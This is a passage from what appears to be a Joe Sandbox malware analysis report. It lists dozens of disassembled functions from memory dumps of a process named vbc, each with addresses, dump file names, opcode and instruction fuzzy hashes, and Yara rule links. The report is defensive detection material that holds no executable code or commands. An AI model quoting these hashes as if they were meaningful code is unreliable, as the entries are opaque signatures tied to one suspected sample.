                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FAB99 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f8d41070572126b0a0d5ed6d64b901ea8db910a804db7f5ef80763d35abd782c
                                                                                                    • Instruction ID: 9a45ed92b29605a104fbfd8303852896fd7f97a47fa88b453307caad935cd50c
                                                                                                    • Opcode Fuzzy Hash: f8d41070572126b0a0d5ed6d64b901ea8db910a804db7f5ef80763d35abd782c
                                                                                                    • Instruction Fuzzy Hash: 31E0122011DBC41FC346C7248C608A6FFF5AE861007088ACFE8D4C7593C715990EC761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5468 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ab54d27ca2f201dbd897c2ff872ff24859a314d14a49b3917bec19f481e9c7bb
                                                                                                    • Instruction ID: bd79143865c9be64e9e158a0b1bda5bc7d1d4cc489bbb95444536c1216e738da
                                                                                                    • Opcode Fuzzy Hash: ab54d27ca2f201dbd897c2ff872ff24859a314d14a49b3917bec19f481e9c7bb
                                                                                                    • Instruction Fuzzy Hash: EDD0623600890DFB8F025E80AC41BB97B15AB04317B648113B74704431963A44F3BF9B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5430 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad5016c833fd1fb971c09d58645cf806c91073d8f2a20b3edb615c8bf889eda8
                                                                                                    • Instruction ID: f4ddcca5aa90e51e5da5c3d5ecced27428dc7dc6fcd1b22ffb7e9b6de581402c
                                                                                                    • Opcode Fuzzy Hash: ad5016c833fd1fb971c09d58645cf806c91073d8f2a20b3edb615c8bf889eda8
                                                                                                    • Instruction Fuzzy Hash: 77E04236200119BF9F059E84DC41CAABB6AEB89660B14C05AFE1546221CA73ED32EBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FF5B8 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b65b6a5222d3e5e8540e906e8bc5f02a33570fa3a3e32195343ce71e620f723d
                                                                                                    • Instruction ID: a67012bb4aa1d24b2538a9576c5bbe161983df86f026bac19a432056a2bf3c82
                                                                                                    • Opcode Fuzzy Hash: b65b6a5222d3e5e8540e906e8bc5f02a33570fa3a3e32195343ce71e620f723d
                                                                                                    • Instruction Fuzzy Hash: D3D01735905208AF8B00DBA5980095ABBE9EB46204B11C2FA95088B212EB324F249B82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005433A0 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0bbf09fbaf8d229ec8e8048139989b52564f7f0324e3aa0411d74c5df3f8b34e
                                                                                                    • Instruction ID: 2051851381f5679b5287e09e4d660d7a02939cc628a2043ca0ed5ffdd4c187ac
                                                                                                    • Opcode Fuzzy Hash: 0bbf09fbaf8d229ec8e8048139989b52564f7f0324e3aa0411d74c5df3f8b34e
                                                                                                    • Instruction Fuzzy Hash: 18E0EC70A00208ABCB44DFA5D955A6DB7F9EB84204F1189A9E9089B240EA316E04AB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522840 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f73e309cc3c8efb13fe77adf360529cb8b5af306d0fe69e1a075b7f854f03330
                                                                                                    • Instruction ID: b359e84456f3d8b3fb12dd99c3f49f9b76fd6ad8355ad4b8fe25c3662146c05b
                                                                                                    • Opcode Fuzzy Hash: f73e309cc3c8efb13fe77adf360529cb8b5af306d0fe69e1a075b7f854f03330
                                                                                                    • Instruction Fuzzy Hash: CCE0C27110C3C01FC356C728CC21857BFA4AE8A22070988DFE0D0C7293C5598C0BC7A2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529BE0 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a204e4dab831473c3afce0b6f9a5adb7e501655af271b9f264e6c046ddc0145d
                                                                                                    • Instruction ID: 106ca6ce80ad157404e4491944390e74b492b8ce94a223fad0913d53f96955b3
                                                                                                    • Opcode Fuzzy Hash: a204e4dab831473c3afce0b6f9a5adb7e501655af271b9f264e6c046ddc0145d
                                                                                                    • Instruction Fuzzy Hash: 70E0C23190E288AFC702CFF48C1099A7FF8AF02204B0640EAD548C7123EA304B10ABA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529478 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                                                                                                    • Instruction ID: 74bd5e682b91a2d78f462f720d40d5774850364329bd47b2e62bddd07364fa43
                                                                                                    • Opcode Fuzzy Hash: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                                                                                                    • Instruction Fuzzy Hash: B2D012321001187F8B01CE84DC01CA67B6DEB89260704C056FD1487211C672DD22DBE0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005227E0 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad5016c833fd1fb971c09d58645cf806c91073d8f2a20b3edb615c8bf889eda8
                                                                                                    • Instruction ID: f4ddcca5aa90e51e5da5c3d5ecced27428dc7dc6fcd1b22ffb7e9b6de581402c
                                                                                                    • Opcode Fuzzy Hash: ad5016c833fd1fb971c09d58645cf806c91073d8f2a20b3edb615c8bf889eda8
                                                                                                    • Instruction Fuzzy Hash: 77E04236200119BF9F059E84DC41CAABB6AEB89660B14C05AFE1546221CA73ED32EBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265030 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 112986c740ebb3ceb0e77f0533f5a255d94cc23b702e684cd544165137afba56
                                                                                                    • Instruction ID: a388335a206433126e5249f7adc283dec118464be2d2092c11150ac077947cad
                                                                                                    • Opcode Fuzzy Hash: 112986c740ebb3ceb0e77f0533f5a255d94cc23b702e684cd544165137afba56
                                                                                                    • Instruction Fuzzy Hash: 6CE0C271908148AFCB01DFE48C00B9BBFF9AB05208F1041EBD9448B212EE304A10DBA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484AAD1 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: edadb663d5824da0f3d83e7b287d36c8bb4cec8279d232a0ec012721bf120105
                                                                                                    • Instruction ID: 15df6443fd916537b9fa65d90dc5f4a299fb8840eb0974e66b483ced631113b4
                                                                                                    • Opcode Fuzzy Hash: edadb663d5824da0f3d83e7b287d36c8bb4cec8279d232a0ec012721bf120105
                                                                                                    • Instruction Fuzzy Hash: A2E0172010E7C49FC307C7388DA5944BF60DE4311130986DBC8858F197C529AE0AD776
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F11F0 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 670cfa624abe95f726863c63014665225c10008b0ec381f301c126837f3f8d3c
                                                                                                    • Instruction ID: 803208b20cba881653ad0d821fc4c6181714515775799be3d406bb2e33f582ee
                                                                                                    • Opcode Fuzzy Hash: 670cfa624abe95f726863c63014665225c10008b0ec381f301c126837f3f8d3c
                                                                                                    • Instruction Fuzzy Hash: CDD05E75909448AF8B00DBF88C509AF7BF99B00208B1142EBA905D7211EA310F105B81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F3238 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: df713c990112035a4ec3113e4966991abd4b5b15451c1dab535119dc2a614dc5
                                                                                                    • Instruction ID: 77b4fd05f4ff606bf73ba50cf1a8004770f1e45429792831ffd242d58c50b80d
                                                                                                    • Opcode Fuzzy Hash: df713c990112035a4ec3113e4966991abd4b5b15451c1dab535119dc2a614dc5
                                                                                                    • Instruction Fuzzy Hash: D7E0127520D3915FD316CB54D96086AFBE6EFD9304B088C8EF5D583295CA229C16CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FDA92 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 380efeee16cea3a7251b49b2654b215a45262efd913648d39372531d402dd7e6
                                                                                                    • Instruction ID: c0b4eba6ef47ba35eecfd3ae170a6161b2fd60030ccd5f99e8330c6dd16a26f2
                                                                                                    • Opcode Fuzzy Hash: 380efeee16cea3a7251b49b2654b215a45262efd913648d39372531d402dd7e6
                                                                                                    • Instruction Fuzzy Hash: 2BD0176010D3C05FC342C7658C61856FFF96E8A11870988CFE4D4C7693C659880BCB32
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FC5A9 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6dae96e1a7d72da6514337631449a7ec832529b87be08b3f43af11828db58956
                                                                                                    • Instruction ID: 085b531c2b32cf27d122f0382632fe06dbf089577cf97ff047005b8c830c50ae
                                                                                                    • Opcode Fuzzy Hash: 6dae96e1a7d72da6514337631449a7ec832529b87be08b3f43af11828db58956
                                                                                                    • Instruction Fuzzy Hash: 60D05E743482802FC305C724CC5ACA2BBB59F86210308C1DEA888C7263E5299C07C720
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00542F50 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7dab8686c5b068db10b7df41b4c586ad50f71ad1a5ee4eb6e72e5577ee43d396
                                                                                                    • Instruction ID: f3b89d8cc41dccc2848617146654e1429b7cb1a148a145eccb8b3a7f58d7f765
                                                                                                    • Opcode Fuzzy Hash: 7dab8686c5b068db10b7df41b4c586ad50f71ad1a5ee4eb6e72e5577ee43d396
                                                                                                    • Instruction Fuzzy Hash: 1CE01270A0120CEFCB44DFA4D54165D77F9EB45304F1185A8D408D7300EA316F009B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1AC8 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 13a51f6dce40d63487d6704ec0f241d7ce507452ec7c670224cc94a5b1d8816f
                                                                                                    • Instruction ID: d13f64ab78f4b1ab0c46b5e46640c23b8f1211f341c4b9e9a42f2ea4c96e4e00
                                                                                                    • Opcode Fuzzy Hash: 13a51f6dce40d63487d6704ec0f241d7ce507452ec7c670224cc94a5b1d8816f
                                                                                                    • Instruction Fuzzy Hash: C0C04C2790E95CD24214D08B6802CB3B65CD4E6772A354177A7578253034CD6857B6BF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F8B58 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 548cc6e9780255c46f2cf8e240ea17b53564f6649724fdedaf77e2ea40fbbb37
                                                                                                    • Instruction ID: 1b60715d8a0ed08c55f1c0a81dc3fbef21868d63501ab99987c86ad75779d668
                                                                                                    • Opcode Fuzzy Hash: 548cc6e9780255c46f2cf8e240ea17b53564f6649724fdedaf77e2ea40fbbb37
                                                                                                    • Instruction Fuzzy Hash: F9D05E1022E7C40FC343C7244CA1491BF60DE4310431985C7D880CF1A3D521591BC365
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F3C59 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0080c8342b7c38a9f9dd61ed97f86f85f4f9ce5c0f1519d711e5ecda38cac23
                                                                                                    • Instruction ID: 58a437842210c540e02f6cf1406cd4d0f1f0abac4b59a624f8badca8ef126eef
                                                                                                    • Opcode Fuzzy Hash: c0080c8342b7c38a9f9dd61ed97f86f85f4f9ce5c0f1519d711e5ecda38cac23
                                                                                                    • Instruction Fuzzy Hash: BED09E3025E6951FC347D6244C665957F61DE43204318C5DBD888CF297D6229D0B9757
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F6521 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 560f531f66622bbef4a0601d013995b4b888a394bdb305f54aa2689c29d8ce82
                                                                                                    • Instruction ID: 3fb7ea9ed9b2cc86d81f96ab6589613c401fdb37832136a3f19f3a3ec0af3bc3
                                                                                                    • Opcode Fuzzy Hash: 560f531f66622bbef4a0601d013995b4b888a394bdb305f54aa2689c29d8ce82
                                                                                                    • Instruction Fuzzy Hash: ADD05E7420C380AFD242CB14C890957BBA2EBC9200F14888FE8C543242C625CC06C661
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00523D00 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                    • Instruction ID: 877f0f7dcd895513f3842dead994786ff947c22c1e70ab8d1161cd6d10d093a9
                                                                                                    • Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                    • Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C532 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fea58dffb18d1c19b62f9b1316f987c976af142106dbfcc75907faa267acf0fe
                                                                                                    • Instruction ID: 5bd2a3f51f6b875d6932c21990387bfb539a6ec28f589a7577cd06cac1b4a4f4
                                                                                                    • Opcode Fuzzy Hash: fea58dffb18d1c19b62f9b1316f987c976af142106dbfcc75907faa267acf0fe
                                                                                                    • Instruction Fuzzy Hash: B1D09E762001586F9B45CE88D850CB67B69EB89220714C45AFD59C7251C672DD22DBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052FDA8 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c97172382e669e5372d0e67c5cba87eefa89673c137d85cd65fd511a290c4f00
                                                                                                    • Instruction ID: 87797e1696716aef82275764e110abf19db4f310b0220a6de0d811b832295f13
                                                                                                    • Opcode Fuzzy Hash: c97172382e669e5372d0e67c5cba87eefa89673c137d85cd65fd511a290c4f00
                                                                                                    • Instruction Fuzzy Hash: 11D012702093805FD306C714CC91852BF659F86210309C5DEE484CB266D5299C07C721
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F6158 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 99941f130973a0df06b60f3951aa1c72c30ef0faf73bbb01402b7d58b1724dc6
                                                                                                    • Instruction ID: 93390c86a384cbd21b0e867a2493d458510dc98742f8904c4a1e79c094609d68
                                                                                                    • Opcode Fuzzy Hash: 99941f130973a0df06b60f3951aa1c72c30ef0faf73bbb01402b7d58b1724dc6
                                                                                                    • Instruction Fuzzy Hash: 6FD0A75122D7C41FC343C7248CA55C07F61EE5310035880CBC884CF157E522581BC711
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F6248 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 55d0d9fd4e0b733a1d6f011ce2c9e526d79f1959a63532cd4f996c0fab8789dc
                                                                                                    • Instruction ID: 3879fcad8c347442da4a6f24b1b573934a85d0ad60f6dd78dc8e28992e1cf876
                                                                                                    • Opcode Fuzzy Hash: 55d0d9fd4e0b733a1d6f011ce2c9e526d79f1959a63532cd4f996c0fab8789dc
                                                                                                    • Instruction Fuzzy Hash: 0AD012B550D3C05FE342D710DD50855FFA1BB96208B0588CED5D5476A2C7A58C0AC711
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F52E8 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b5a228ad4f3aad1c3c4d9d44f3f35c10aad4938398b89d95a3134dd25432ad24
                                                                                                    • Instruction ID: 57986a39d532b56036ee29651218702b4dfcade7d2dc863d9b92f14340f51c66
                                                                                                    • Opcode Fuzzy Hash: b5a228ad4f3aad1c3c4d9d44f3f35c10aad4938398b89d95a3134dd25432ad24
                                                                                                    • Instruction Fuzzy Hash: 94D0A77011E2C84FC382C3208C1C855FFA4CF47101309C5DFC441CF167C5255A0AD765
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FA599 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 79d49e5ce16617631c9cec8b85b69e5d4a7cf4d1ae61f155c5d3f0d291ac1da0
                                                                                                    • Instruction ID: b6d5ea5369502bd5445383392dc0ec4e34709f4c2c9bd24a2000fbf9b9175d6d
                                                                                                    • Opcode Fuzzy Hash: 79d49e5ce16617631c9cec8b85b69e5d4a7cf4d1ae61f155c5d3f0d291ac1da0
                                                                                                    • Instruction Fuzzy Hash: 24D09236200118BF9B05DE84D841CAABB6AEB89260B14C45AFD1987251CAB3DD22EB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052BB40 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dfe44d24a336c325508e541b63f848b9cdf91876033f131d96f82a89b012457c
                                                                                                    • Instruction ID: 6bbc26c322646879b1e1dcb561f0a7229fc3536aa43e8b01b5e5d0ab7d31c735
                                                                                                    • Opcode Fuzzy Hash: dfe44d24a336c325508e541b63f848b9cdf91876033f131d96f82a89b012457c
